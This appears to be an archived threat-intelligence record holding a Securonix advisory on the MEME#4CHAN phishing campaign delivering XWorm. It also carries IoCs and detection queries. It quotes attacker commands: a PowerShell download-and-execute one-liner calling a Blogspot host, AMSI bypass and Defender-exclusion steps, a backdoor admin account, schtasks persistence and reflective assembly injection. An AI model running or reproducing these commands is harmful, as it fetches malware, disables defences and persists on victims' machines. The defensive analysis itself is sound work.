{
	"id": "29d1a197-d4a0-45a8-84d8-7166ceea538e",
	"created_at": "2026-04-06T00:08:25.575901Z",
	"updated_at": "2026-04-10T13:12:43.451473Z",
	"deleted_at": null,
	"sha1_hash": "9da82963106b91cf0e93addc4504bf8bcd969f26",
	"title": "Securonix Threat Labs Security Advisory: Latest Update: Ongoing MEME#4CHAN Attack/Phishing Campaign uses Meme-Filled Code to Drop XWorm Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9269346,
	"plain_text": "Securonix Threat Labs Security Advisory: Latest Update: Ongoing MEME#4CHAN Attack/Phishing Campaign uses Meme-Filled Code to Drop XWorm Payloads\r\nArchived: 2026-04-05 21:34:46 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nTL;DR\r\nAn unusual attack/phishing campaign delivering malware while using meme-filled code and complex obfuscation methods has been dropping XWorm payloads for the last few months and is still ongoing today.\r\nIntro\r\nFor the last few months, an interesting and ongoing attack campaign has been identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) leverages rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload, to infect its victims. Today, we’ll dive into this campaign with an in-depth technical analysis of the entire attack chain, starting with the phishing email samples, covering obfuscation methods, and ending with an analysis of the final binary payload that gets decoded from .NET assemblies in PowerShell.\r\nThe attack chain leveraging XWorm payloads was first reported by threat researchers at Elastic. Today, we will take a look at some new unique payloads along with new obfuscation methods used by the attackers that were not covered before. We will also provide new samples, IoCs and detections which we’ve been tracking since the start of the campaign a few months ago.\r\nThe attack begins with a malicious Microsoft Office Word document and appears to be targeting various businesses, including Germany / .de email addresses. 
Microsoft Word attachments have fallen out of favor since Microsoft decided to disable macro execution by default; however, as we dive into one of the samples collected today, attempted code execution from a macro-less document is still very much in use.\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 1 of 17\n\nAttack chain overview\r\nThe [MEME#4CHAN] campaign follows a rather unique attack chain consisting of both PowerShell and JavaScript execution originating from a malicious Word document file.\r\nC# code execution contained within the main PowerShell script is used to deliver the final payload, which ends with XWorm v3.1 execution. Below is a diagram of the overall attack chain. We will dive into each portion of the attack chain in depth as we continue.\r\nFigure 1: [MEME#4CHAN] attack chain\r\nInitial infection\r\nAs with many modern attacks we see these days, MEME#4CHAN typically begins with a phishing email. The attacks appear to be patterned after a known fake hotel reservation phishing scheme. The goal is to get the company employee to open the attached phishing document, which will kick off the initial code execution portion of the attack. Typically the subject, body and even contents of the lure attachment are designed to create a sense of urgency to mask any potentially unusual requests.\r\nPhishing email details\r\nIn one example, the phishing email contained the subject “Reservation For Room” with a brief message in the body containing generic text about room and booking requests. The email appears to be sent from “zoe[at]kbowlingslaw.com”; however, after examining the header, the actual sender was a Gmail address: “panelnew12[at]gmail.com”.\r\nWhat makes this particular phishing campaign especially interesting is the fact that the target email belonged to a German company involved in manufacturing. 
This could indicate that the attackers are not only specifically targeting hotels, but blasting out phishing emails using a generic corporate email list and hoping for the best. To bolster this theory, another phishing email our team intercepted was from the same Gmail address, contained the subject “Urgent booking for Honeymoon” and was targeted at a small German hospital clinic.\r\nMost of the phishing emails analyzed by the team followed the same pattern, so we’ll dive into one of these in depth.\r\nStage 1: Email attachment analysis: Details for booking.docx\r\nThroughout the rest of this article, we’ll follow the attack chain of one document, though others were overall similar and produced the same final result. In this example, the email attachment is a single Microsoft Word document file named “Details for booking.docx”. When opened, a prompt appears before any content is displayed, asking the user if they want to update the document with externally linked files.\r\nFigure 2: Details for booking.docx linked files prompt\r\nIf either of the prompts is clicked, the pop-up closes and we’re presented with what look like stolen images of a bank debit card as well as a driver’s license. Both cards appear to belong to two different French citizens.\r\nThe document contains no macros or discernible p-code, which means that macro execution is not the attack vector for the phishing document.\r\nFigure 3: Details for booking.docx file contents\r\nRather than using macros to execute malicious VBScript, this document uses a known vulnerability from last year (CVE-2022-30190). In summary, this vulnerability works by embedding external objects contained in a relationship file within the .docx Word file. 
These relationship files can reference external objects included inside the doc.\r\nIn this example, the document footer contained a shape object that was used maliciously. The shape object used the footer relationship file “footer2.xml.rels” to fetch the external objects.\r\nFigure 4: Details for booking.docx external references\r\nNotice on the right side of the figure above that the relationship file contains two links to external resources.\r\nhxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093[.]docx\r\nThe referenced file 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx appears to be an empty MS document file containing a single picture with a small white square. The same code execution tactic happens again with the same referenced Blogspot URL as the original.\r\nThe other URL contained in the original phishing document references the atom.xml file hosted on Usrfiles, a public file sharing service. This file redirects to another URL which downloads and executes a PowerShell script hosted at:\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt\r\nSome documents we observed executed PowerShell code directly contained within the atom.xml file, while others, as in this case, referenced a separate URL containing the malicious PowerShell code.\r\nStage 2: PowerShell execution\r\nThe PowerShell that gets executed at this stage is semi-obfuscated and contains quite a few functions which we’ll dive into further on. 
The code is rather interesting and contains memes, crass variable names and comments throughout, so you’ll have to pardon the use of the blur tool throughout the next series of figures as we go through it and subsequent files.\r\nFigure 5: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – C# and initial execution\r\nThe script begins by stopping the RegSvcs and Msbuild processes. We’ll get into why this is important further down. After that, a directory inside C:\\ProgramData\\ is created called MEMEMAN, which is where most of the malware staging from this point will happen.\r\nThe $NuclearDefusion variable contains a C# script that accomplishes a few tasks. First, at the beginning, there is a deobfuscation function named £££ which is used to hex decode some of the other variables later on.\r\nTwo additional variables, each with their own PowerShell code, are contained inside the $amsii variable contained in the JJJI function:\r\n$AMI: This variable contains a long hexadecimal string that is triple hex encoded. Once decoded, we’re presented with a simple obfuscated AMSI bypass technique which uses Matt Graeber’s reflection method to crash the AMSI (Anti-malware Scan Interface) instance for the current PowerShell session. This will prevent subsequent code from being scanned for malicious content.\r\nFigure 6: $AMI – AMSI bypass techniques\r\nNext, a registry key is created under “HKCU:\\\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32” with a default value set to “C:\\IDontExist.dll”. This registry change also assists in disabling AMSI by overriding the Microsoft Defender COM object for AMSI and pointing it to a DLL that doesn’t exist.\r\n$DEF: This variable contains PowerShell code to once again disable AMSI using the same two methods as before, just obfuscated differently. 
Additionally, Defender exclusions are created for pretty much everything on the host using the “Add-MpPreference” PowerShell cmdlet.\r\nFigure 7: $DEF – Code samples: Disable AMSI, Defender exclusions, and new local user\r\nTowards the end of the script, a new local user named “System32” with a password of 123 is created. The new local user is then added to the Administrators and Remote Desktop Users groups. And then lastly, Windows Firewall is disabled.\r\nMoving through the C# script, we run into another obfuscated variable called $CHOTAbheem which contains a long encoded string. Further down we see it leveraging the £££ function to decode it.\r\nFigure 8: Deobfuscated code behind $CHOTAbheem decoded\r\nThe script above leverages the WScript.Shell COM object “{40FC6ED5-2438-11CF-A3DB-080036F12502}” to execute the $NuclearDefusion variable, which we’ll see written to disk later on. This takes us through the first half of the original PowerShell script.\r\nFigure 9: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – PowerShell code\r\nThe code referenced in the first half of the script is written to disk and saved in the “C:\\ProgramData\\MEMEMAN” directory as “CypherDeptography.~+~” using the PowerShell [IO.File]::WriteAllText method.\r\nNext, let’s take a look at what’s hidden away behind the $allsave variable. Once decoded using the same method we used to decode the $CHOTAbheem variable, we’re faced with a hugely obfuscated JScript one-liner as seen in the figure below.\r\nFigure 10: $allsave JScript and deobfuscated PowerShell code\r\nOnce decoded, the script behind $allsave is similar to that of $CHOTAbheem. 
However, this appears to invoke a variable that is referenced in the main script which points to:\r\nhxxps://backuphotelall.blogspot[.]com/atom.xml\r\nUnfortunately, we were not able to pull this script as the Blogspot URL was taken offline at some point. However, we can speculate that it is similar to that of the original atom.xml script.\r\nNext down the list, we’ve got a repeating function (probably for redundancy) where the $shakalakaboomboom variable is decoded. In the end, carving through the layers of obfuscation once again, it retrieves yet another atom.xml file from the following URL:\r\nhxxps://3000allfitheyito.blogspot[.]com/atom.xml\r\nPersistence is established by writing the obfuscated JScript code to disk and saving it as \\ZeeNEWsTV\\UpdateEscan.js using the WriteAllText method. A scheduled task is then created called EscanDissldo referencing the newly created file that runs once every 200 minutes.\r\nschtasks /create /sc MINUTE /mo 200 /tn EscanDissldo /F /tr “wscript.exe //b //e:jscript C:\\\\ProgramData\\\\MEMEMAN\\\\UpdateEscan.js”\r\nThe next level of persistence happens during the last 4 lines of code, where all of the content from the staging directory (“C:\\ProgramData\\MEMEMAN\\“) is copied to the user’s startup directory. This is defined using “[environment]::getfolderpath(“Startup”)”.\r\nLastly, the script deletes the C# decode script, or any file ending in *.~+~, from the startup directory.\r\nStage 3: Binary file execution\r\nCircling back to the C# script portion of the original PowerShell script, there are two variables which contain binary file data. 
Both are heavily obfuscated .NET binaries which leverage the unlicensed version of .NET Reactor to hide the original source code.\r\nBoth binary files are injected into the RegSvcs.exe or Msbuild.exe process using in-memory execution of .NET assemblies via reflection. For reference, the $Ripple variable contains the hexadecimal binary data for sssss.exe, which we’ll be going over further down.\r\nFigure 11: In-memory assembly execution\r\nThere is a good amount of obfuscation in the P4 function; however, once decoded it is a bit easier to observe what the code is attempting to accomplish.\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},(“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe”, $Ripple)\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},(“C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe”, $Ripple)\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},(“C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe”, $Ripple)\r\nBased on some of the hard-coded strings, this appears to be XWorm V3.1 which, interestingly enough, was recently cracked and published online.\r\nBinary file analysis: sssss.exe\r\nSince XWorm is pretty well known we won’t be diving too deep into the binary analysis portion. The binary file was assembled with an original file name of sssss.exe and is hidden behind the variable $MEME2026. The variable is essentially a long string of hexadecimal characters which, when decoded, make up the entire binary file.\r\nThe executable is overall quite small, at around 85KB, and was compiled using VS. 
Taking a look at the metadata in the figure below, it appears to pattern itself off of what you might find for an AVG install file, though this executable was not digitally signed.\r\nFigure 12: sssss.exe binary file details\r\nOnce we were able to deobfuscate a majority of the script, we were able to determine some basic functionality. In the figure below we see some connection parameters being defined. It establishes a connection to a remote HTTP server using a POST request with one of three user agents chosen at random:\r\n“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”\r\n“Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1”\r\n“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36”\r\nFigure 13: sssss.exe connection parameters\r\nA unique ID is generated using the victim’s processor count, user name, machine name, OS version, and total drive size. This is used to identify the victim host within the attacker’s C2 architecture.\r\nFrom a command and control standpoint, the RAT offers a large number of attacker-initiated commands. 
Below is a table of the commands and a brief description of their intended functionality.\r\nCommand: Details\r\nrec: Restart application\r\nCLOSE: Close application\r\nUninstall: Purges all RAT files, registry keys and scheduled tasks, then exits\r\nupdate: Runs the uninstall function, decompresses a file from a byte stream, opens a new memory stream\r\nDW: Writes a .ps1 file from the attacker’s server and executes it using the command: powershell.exe -ExecutionPolicy Bypass -File “filename.ps1”\r\nFM: Takes an assembly from a provided byte array, then creates an instance of the assembly’s entry point type and invokes it.\r\nLN: Downloads a file and executes it using Process.Start(filename).\r\nUrlopen: Performs an HTTP GET request to a provided URL using the default browser\r\nUrlhide: Same as Urlopen, but builds the web connection within the binary itself, hidden from the user\r\nPCShutdown: Shuts down the victim machine using the following command: shutdown.exe /f /s /t 0\r\nPCRestart: Restarts the victim machine using the following command: shutdown.exe /f /r /t 0\r\nPCLogoff: Logs off the user using the following command: shutdown.exe -L\r\nStartDDos: Begins a DDoS attack against the target\r\nStopDDos: Stops the DDoS attack\r\nStartReport: Attempts to abort the existing thread and then creates a new thread for the instance with the passed-in parameters\r\nStopReport: Stops the newly created thread\r\nXchat: Opens a socket and sends specified data to the attacker’s machine\r\nngrok: Opens a socket and uses ngrok functionality\r\nplugin: Unknown: appears to check for the existence of “plugin” related data\r\nsavePlugin: Unknown: processing of additional plugin-related data\r\nOfflineGet: Performs a connectivity check\r\nCap: Captures the current user’s desktop\r\nMessageBox: Sends a message to the logged in user using MessageBox.Show();\r\nOther functionality includes clipboard monitoring, command shell, DOS capabilities, disable/enable UAC, and the ability to throw a BSOD.\r\nIn addition to the functionality above, the RAT also leverages WMI objects to pull additional data such as antivirus information and date and time information. While the connection strings were heavily obfuscated within the executable, dynamic analysis produced a connection with the following information:\r\n212.87.204[.]83:3000\r\nPort3000newspm.duckdns[.]org\r\nSome Possible Attribution Insights\r\nThe attack methodology is similar to that of TA558, where phishing emails were delivered targeting the hospitality industry. TA558 also typically uses a wide range of C2 campaign artifacts and payloads similar to, but not positively in line with, what we witnessed through the MEME#4CHAN campaign.\r\nBased on the English meme-themed code and 4chan references, it’s likely that the malicious threat actor originates from a group of English-speaking origin, such as the UK or US. Some of the malicious attack activity appears to be targeting victims in Germany.\r\nAdditional sample analysis\r\nIn addition to the attack chain above beginning with Details for booking.docx, the Securonix Threat Research team also identified other connected samples, including:\r\nDocument: C2 Infrastructure\r\nAutorização do documento.docx: hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file ; hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml\r\nPassport and Id for booking details.docx: hxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file\r\nPost exploitation analysis and observations\r\nWe observed the attackers execute the following commands on our system. 
As you can see, the executed commands originated from the RegSvcs.exe process, confirming the in-memory injection technique seen in the original PowerShell script.\r\nProcess: Command line\r\nwinword.exe: winword.exe /n “c:\\users\\[redacted]\\downloads\\autorização do documento.docx” /o “”\r\nexplorer.exe: c:\\windows\\explorer.exe\r\nmshta.exe: c:\\windows\\system32\\mshta.exe -embedding\r\nsvchost.exe: c:\\windows\\system32\\svchost.exe -k dcomlaunch -p\r\nregsvcs.exe: powershell.exe -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1\r\nschtasks.exe: Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript c:\\\\programdata\\\\REDACTED\\\\windowsdefenderupdate.js”\r\npowershell.exe: “c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe” -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1\r\nC2 and infrastructure\r\nMuch of the infrastructure used in the MEME#4CHAN campaign was hosted on public file sharing services such as usrfiles and mediafire. Additionally, atom.xml files on random blogspot domains were used. 
Some either redirected to a .txt file containing malicious PowerShell code while others contained the PowerShell code directly.\r\nThe following IP addresses and domains were observed as a part of the overall C2 infrastructure during the [MEME#4CHAN] campaign.\r\nConclusion\r\nThe [MEME#4CHAN] campaign provided us with some interesting insights. 
Though phishing emails rarely use Microsoft\r\nOffice documents since Microsoft made the decision to disable macros by default, today we’re seeing proof that it is still\r\nimportant to be vigilant about malicious document files, especially in this case where there was no VBscript execution from\r\nmacros.\r\nIt’s likely that since several C2 domains are still active that this campaign is ongoing. Also, given the fact that XWorm v3.1\r\nwas recently cracked and released, it’s likely that activity surrounding this particular strain will only increase.\r\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments especially from those that are unexpected or are from outside the organization. Be\r\nextra vigilant with Microsoft document files, even if there are no macros present.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection\r\ncoverage.\r\nMonitor for the usage of potentially malicious file hosting websites such as mediafire and usrfiles.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK Matrix\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 13 of 17\n\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nT1204.001: User Execution: Malicious Link\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1055.009: Process Injection: Proc Memory\r\nT1620: Reflective Code Loading\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / 
Startup Folder\r\nT1053: Scheduled Task/Job\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nDetails for booking.docx f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744\r\nAutorização do documento.docx 9cd785dbcceced90590f87734b8a3dbc066a26bd90d4e4db9a480889731b6d2\r\nCard \u0026 Booking Details.docx 3c3e24c01a675b3b17bee9c8f560a33c3ecca8c44442fd5b3dd8c0f4429f279b\r\nPassport and Id for booking details.docx 6d86f36b2220e8d9580e6708856fa74f37f7aa35db1a708e17ecacf0de3d5d2e\r\n73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx db1185f24c56cadec1c85a33b0efeb2d803ff00abf4c9df1e00d860683068415\r\n529f38_ab5ac880c56841bca4889e2e53082ddf.docx 41c68aecada65a15f4a8bea52cc25033a1b73ff7340cd3865d55c61ded566e81\r\n73cceb_c6672ebf7c8e4edb9e3f2612ab056923.txt 292b5a8c61eb79633590b6b13c0b41388ccad3535b55ed822b887d6d15d61b\r\n73cceb_e5a698286daf43ac87b4544a35b1a482.txt 59d72ff91e94a2c762285cce3bcb3e94e8d14608c2eeecacdcd6fe720c3ad5f2\r\n73cceb_b2df5636b5c54a73b438fa5ae338326b.txt 9419d7a578338a714f976fb2b9eb320049422ec7059cedcc4a8baf144c4df41b\r\n73cceb_e5c443158f5b446daab366060229bc37.txt 2725a14da90a6bcbfde174df8b0e95179b617aa14ec07a2d1fc71000310ad91\r\n73cceb_69fbb28af79141d4b6bec17ff2cf1850.txt 4746941996305743c9d0bcb96ed4b2b930355cd8782098aa5600b421313143\r\n73cceb_33dedbe277af4ba48b81c1486becec3e.txt c443d754153180ebeee1106d5eecf1024e063413f3f92a29c6c95a08c6f2e633\r\n73cceb_33dedbe277af4ba48b81c1486becec3e.txt 1005feeff2ecfe6e53f53f63a2364de8418863d83e256322ca82e939dae95e45\r\n73cceb_a27333f1bf71425199c62379dc2c4fbf.txt 
6005529195e6afac29d8c62091ee7990e92b7a80b391b03c34c8a8fbf019fce6\r\n637c10a8-1401-4193-bede-dc80e432f3b6-\r\ndom.html\r\nf0942afa08c509f58b4b9f02cae4581ebf712f2f1763f1a2ffb8f9d964e335ae\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 14 of 17\n\nFile Name SHA256 (IoC)\r\n529f38_03f0f1ffb57c407198e05107306a4f6f.txt d4fdc73d563605cadf1ded9b644f21e8dae0f65870890357e5bc554bbc66bf74\r\n529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56.txt 1b5ec95836cd52efa853ba3fa76d0849e4094b32048952a7ac0676d34f25177\r\n529f38_41875cf4c8844415994858b3623063f9.txt 1ae5589b6c358ff11a9555a7265ba5f0709be7a865e2cf51af04eb17b2a2ce18\r\n529f38_9ce24968dc7342deb680dad14f365bc5.txt 1a517a25d55aae6af13d025b1d1edee7fb185b90155f30e195f58cbf4c6b36fe\r\n529f38_532d9fab787f45a9a533a9be38cab909.txt d9a1c97646872be823bce7e37325f9869daa5593f3ced37024dc5188243639b\r\nexcelDNALibrary-AddIn64-packed.xll 90cb95264d0b555fe9a760de404196ac183a958c9cc1aad0689598e35fbb0c3\r\nsssss.exe 3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16\r\nbin.dll 4fc40af3b2e3f96e8013a7187e5cb4ce1a00a9528823f789cb8aca09c51143c6\r\n201871865 9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0\r\nSome Example of Relevant Securonix detection policies\r\nEDR-ALL-1038-RU\r\nEDR-ALL-730-ER\r\nEDR-ALL-30-ER\r\nCEDR-ALL-30-ER\r\nEDR-ALL-932-RU\r\nWEL-ALL-1070-RU\r\nEDR-ALL-979-RU\r\nEDR-ALL-351-RU\r\nWEL-ALL-1069-RU\r\nEDR-ALL-1086-RU\r\nEDR-ALL-1100-ER\r\nEDR-ALL-1215-ERR\r\nWEL-ALL-1186-ERR\r\nEDR-ALL-1209-RU\r\nPSH-ALL-231-RU\r\nPSH-ALL-227-RU\r\nPSH-ALL-314-RU\r\nRelevant Spotter queries\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (resourcecustomfield1\r\nCONTAINS “Set-MpPreference” OR resourcecustomfield1 
CONTAINS “Add-MpPreference”) AND\r\n(resourcecustomfield1 CONTAINS “-DisableRealtimeMonitoring” OR resourcecustomfield1 CONTAINS “-\r\nDisableBehaviorMonitoring”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\ndestinationprocessname = “schtasks.exe” AND (resourcecustomfield1 CONTAINS “\\ProgramData\\” OR\r\nresourcecustomfield1 CONTAINS “\\Users\\” OR resourcecustomfield1 CONTAINS “\\Public\\” OR\r\nresourcecustomfield1 CONTAINS “\\AppData\\” OR resourcecustomfield1 CONTAINS “\\Desktop\\” OR\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 15 of 17\n\nresourcecustomfield1 CONTAINS “\\Downloads\\” OR resourcecustomfield1 CONTAINS “\\Temp\\” OR\r\nresourcecustomfield1 CONTAINS “\\Tasks\\” OR resourcecustomfield1 CONTAINS “\\$Recycle”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\n(destinationprocessname = “reg.exe” OR destinationprocessname = “mshta.exe” OR destinationprocessname =\r\n“cscript.exe” OR destinationprocessname = “regsvr32.exe” OR destinationprocessname = “wscript.exe” OR\r\ndestinationprocessname = “schtasks.exe”) AND (resourcecustomfield1 CONTAINS ” Invoke-” OR\r\nresourcecustomfield1 CONTAINS “FromBase64String” OR resourcecustomfield1 CONTAINS “New-Object” OR\r\nresourcecustomfield1 CONTAINS ” IEX(” OR resourcecustomfield1 CONTAINS “|IEX” OR resourcecustomfield1\r\nCONTAINS ” bypass “)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message 
CONTAINS “}{0}” OR\r\nmessage CONTAINS “} {0}”) AND message CONTAINS ” -f” AND (message NOT CONTAINS\r\n“WarningWriteDownRecoveryPasswordInsertExternalKeyRestart” AND message NOT CONTAINS\r\n“ErrorSidProtectorRequiresAdditionalRecoveryProtector” AND message NOT CONTAINS “=\\windows\\sentinel\\”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS\r\n“System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR\r\nmessage CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS\r\n“System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR\r\nmessage CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated\r\nby= Microsoft Corporation” AND message NOT CONTAINS “Generated by: Microsoft Corporation”)\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “Web Proxy”) AND (destinationaddress = “193.149.185[.]229”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS “73cceb_” AND requesturl\r\nCONTAINS “.txt”\r\nindex = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS\r\n“powpowpowff.blogspot[.]com” OR requesturl CONTAINS “huskidkifklaoksikfkfijsju.blogspot[.]com” OR\r\nrequesturl CONTAINS “backuphotelall.blogspot[.]com” OR requesturl CONTAINS\r\n“3000allfitheyito.blogspot[.]com” OR requesturl CONTAINS “urlintimacygoombguch.blogspot[.]com” OR\r\nrequesturl CONTAINS “giv692dqvctosb3/50002023[.]txt” OR requesturl CONTAINS\r\n“port3000newspm.duckdns[.]org” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR requesturl\r\nCONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “port5000duki.blogspot[.]com” OR requesturl\r\nCONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “billielishhui.blogspot[.]com” OR requesturl\r\nCONTAINS “doccallingupdate.blogspot[.]com” OR requesturl 
CONTAINS\r\n“urlpropogationintimitacyi[.]blogspot.com”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “WinDefend”\r\nAND message CONTAINS “Stop-Service” AND message CONTAINS “ -StartupType” AND message CONTAINS\r\n“Disabled”\r\nReferences:\r\n1. Elastic: Attack chain leads to XWORM and AGENTTESLA\r\nhttps://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla\r\n2. Securonix Threat Labs Initial Coverage Advisory: RCE 0-Day in MS Office (CVE-2022-30190)\r\nhttps://www.securonix.com/blog/rce-0-day-in-ms-office-using-ole-object-cve-2022-30190-analysis/\r\n3. ProofPoint: Reservations Requested: TA558 Targets Hospitality and Travel\r\nhttps://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel\r\n4. enigma0x3: Bypassing AMSI via COM Server Hijacking\r\nhttps://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\r\n5. Reddit: XWorm v3.1 Cracked\r\nhttps://www.reddit.com/r/blackhatrussia/comments/11jqko9/xworm_v31_cracked/\r\nSource: https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nIt establishes a connection to a remote HTTP server using a POST request; below we see some of the connection parameters being defined, with one of three user agents chosen at random:\n“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/"
	],
	"report_names": [
		"securonix-threat-labs-security-meme4chan-advisory"
	],
	"threat_actors": [
		{
			"id": "316b23b5-e097-4dc6-8b1c-d096860c6c16",
			"created_at": "2022-10-25T16:07:24.290801Z",
			"updated_at": "2026-04-10T02:00:04.924688Z",
			"deleted_at": null,
			"main_name": "TA558",
			"aliases": [],
			"source_name": "ETDA:TA558",
			"tools": [
				"AZORult",
				"AsyncRAT",
				"Bladabindi",
				"ExtRat",
				"Jorik",
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Nymeria",
				"PuffStealer",
				"Remcos",
				"RemcosRAT",
				"Remvio",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Rultazo",
				"Socmer",
				"Vengeance Justice Worm",
				"Vjw0rm",
				"Xtreme RAT",
				"XtremeRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "cf91b389-9602-45c0-8d6b-c61d14800f54",
			"created_at": "2023-01-06T13:46:39.448277Z",
			"updated_at": "2026-04-10T02:00:03.332604Z",
			"deleted_at": null,
			"main_name": "TA558",
			"aliases": [],
			"source_name": "MISPGALAXY:TA558",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434105,
	"ts_updated_at": 1775826763,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.pdf",
		"text": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.txt",
